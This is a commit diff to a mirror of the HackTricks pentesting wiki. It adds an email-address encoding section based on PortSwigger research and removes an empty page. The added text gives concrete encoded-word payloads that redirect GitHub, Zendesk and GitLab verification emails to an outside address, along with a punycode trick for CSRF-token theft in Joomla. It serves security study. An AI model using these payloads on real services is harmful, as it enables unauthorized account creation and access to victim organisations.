mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
GITBOOK-4384: No subject
This commit is contained in:
parent
144069a83c
commit
2ed24193bb
3 changed files with 71 additions and 42 deletions
|
@ -840,7 +840,6 @@
|
||||||
* [Burp Suite](todo/burp-suite.md)
|
* [Burp Suite](todo/burp-suite.md)
|
||||||
* [Other Web Tricks](todo/other-web-tricks.md)
|
* [Other Web Tricks](todo/other-web-tricks.md)
|
||||||
* [Interesting HTTP](todo/interesting-http.md)
|
* [Interesting HTTP](todo/interesting-http.md)
|
||||||
* [Emails Vulnerabilities](todo/emails-vulns.md)
|
|
||||||
* [Android Forensics](todo/android-forensics.md)
|
* [Android Forensics](todo/android-forensics.md)
|
||||||
* [TR-069](todo/tr-069.md)
|
* [TR-069](todo/tr-069.md)
|
||||||
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
|
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
|
||||||
|
|
|
@ -3,14 +3,14 @@
|
||||||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
Get Access Today:
|
Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -97,6 +97,10 @@ Depending on the **origin of the sendmail** binary different options have been d
|
||||||
|
|
||||||
## Inject in the e-mail name
|
## Inject in the e-mail name
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
### Ignored parts of an email
|
### Ignored parts of an email
|
||||||
|
|
||||||
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
|
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
|
||||||
|
@ -122,6 +126,67 @@ You can also use IPs as domain named between square brackets:
|
||||||
* john.doe@\[127.0.0.1]
|
* john.doe@\[127.0.0.1]
|
||||||
* john.doe@\[IPv6:2001:db8::1]
|
* john.doe@\[IPv6:2001:db8::1]
|
||||||
|
|
||||||
|
### Email Encoding
|
||||||
|
|
||||||
|
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:
|
||||||
|
|
||||||
|
* **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
|
||||||
|
* `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
|
||||||
|
that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Different encodings:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Format
|
||||||
|
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
|
||||||
|
|
||||||
|
# =? -> Start of encode
|
||||||
|
# utf-8 -> encoding used
|
||||||
|
# ? -> separator
|
||||||
|
# q -> type of encoding
|
||||||
|
# ? -> separator
|
||||||
|
# =41=42=43 -> Hex encoded data
|
||||||
|
# ?= end of encoding
|
||||||
|
|
||||||
|
# Other encodings, same example:
|
||||||
|
# iso-8859-1
|
||||||
|
=?iso-8859-1?q?=61=62=63?=hi@example.com
|
||||||
|
# utf-8
|
||||||
|
=?utf-8?q?=61=62=63?=hi@example.com
|
||||||
|
# utf-7
|
||||||
|
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
|
||||||
|
# q encoding + utf-7
|
||||||
|
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
|
||||||
|
# base64
|
||||||
|
=?utf-8?b?QUJD?=hi@example.com
|
||||||
|
# bas64 + utf-7
|
||||||
|
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
|
||||||
|
#punycode
|
||||||
|
x@xn--svg/-9x6 → x@<svg/
|
||||||
|
```
|
||||||
|
|
||||||
|
Payloads:
|
||||||
|
|
||||||
|
* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
|
||||||
|
* Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00` 
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
|
||||||
|
* Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
|
||||||
|
* Note the use of the underscore as a space to separate address
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Punycode: Using Punycode it was possible to inject a tag `<style` in Joomla and abuse it to steal the CSRF token via CSS exfiltration.
|
||||||
|
|
||||||
|
#### Tooling
|
||||||
|
|
||||||
|
* There is a **Burp Suite Turbo Intruder script** to fuzz these kind of combinations to try to attack email formats. The script already have potentially working combinations.
|
||||||
|
* It's laso possible to use [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) to create an email splitting attack
|
||||||
|
|
||||||
### Other vulns
|
### Other vulns
|
||||||
|
|
||||||
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
||||||
|
@ -161,8 +226,8 @@ For more detailed information, AWS's official documentation on handling bounces
|
||||||
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -178,7 +243,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
|
||||||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
Get Access Today:
|
Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||||
|
|
|
@ -1,35 +0,0 @@
|
||||||
# Emails Vulnerabilities
|
|
||||||
|
|
||||||
{% hint style="success" %}
|
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Support HackTricks</summary>
|
|
||||||
|
|
||||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
||||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
{% endhint %}
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
{% hint style="success" %}
|
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Support HackTricks</summary>
|
|
||||||
|
|
||||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
||||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
{% endhint %}
|
|
Loading…
Reference in a new issue